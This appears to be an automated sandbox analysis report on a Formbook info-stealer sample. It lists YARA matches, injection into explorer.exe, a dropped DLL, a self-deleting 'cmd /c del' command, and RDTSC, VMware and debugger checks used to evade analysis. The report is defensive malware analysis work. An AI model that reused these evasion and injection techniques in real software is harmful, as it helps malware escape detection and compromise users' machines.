          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@14/5
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_01
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeFile created: C:\Users\user\AppData\Local\Temp\nsxFC19.tmpJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: AQJEKNHnWK.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: AQJEKNHnWK.exeVirustotal: Detection: 18%
          Source: AQJEKNHnWK.exeReversingLabs: Detection: 35%
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeFile read: C:\Users\user\Desktop\AQJEKNHnWK.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\AQJEKNHnWK.exe 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess created: C:\Users\user\Desktop\AQJEKNHnWK.exe 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess created: C:\Users\user\Desktop\AQJEKNHnWK.exe 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: explorer.pdbUGP source: AQJEKNHnWK.exe, 00000001.00000002.256768707.00000000026C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AQJEKNHnWK.exe, 00000000.00000003.210067388.000000001F0E0000.00000004.00000001.sdmp, AQJEKNHnWK.exe, 00000001.00000002.256332303.0000000000B5F000.00000040.00000001.sdmp, explorer.exe, 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AQJEKNHnWK.exe, explorer.exe
          Source: Binary string: explorer.pdb source: AQJEKNHnWK.exe, 00000001.00000002.256768707.00000000026C0000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeUnpacked PE file: 1.2.AQJEKNHnWK.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00415047 pushad ; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041600E pushad ; retf
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00411254 push edi; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00414D4F push FFFFFFA9h; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00ABD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_00415047 pushad ; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041600E pushad ; retf
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_00411254 push edi; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_00414D4F push FFFFFFA9h; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0498D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F5047 pushad ; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F600E pushad ; retf
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F1254 push edi; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004FC2CD push ss; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004FB3B5 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004FB46C push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004FB40B push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004FB402 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F4D4F push FFFFFFA9h; ret
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeFile created: C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dllJump to dropped file
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000004E85E4 second address: 00000000004E85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000004E897E second address: 00000000004E8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6156Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 3252Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000004.00000000.237332998.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.237332998.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000004.00000000.241478036.0000000008907000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.236730090.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.234484332.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.227235190.0000000004DF3000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000004.00000000.229063771.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000007.00000002.472073266.0000000002DBC000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000000.237332998.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000004.00000000.237332998.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.237639933.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000004.00000000.229097394.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000004.00000000.234484332.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.234484332.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.234484332.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_740D1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_025B187C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_025B1664 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B22073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B31074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AF41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A84120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A78A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A83A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A65210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B38A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AF4257 mov eax, dword ptr fs:[00000030h]
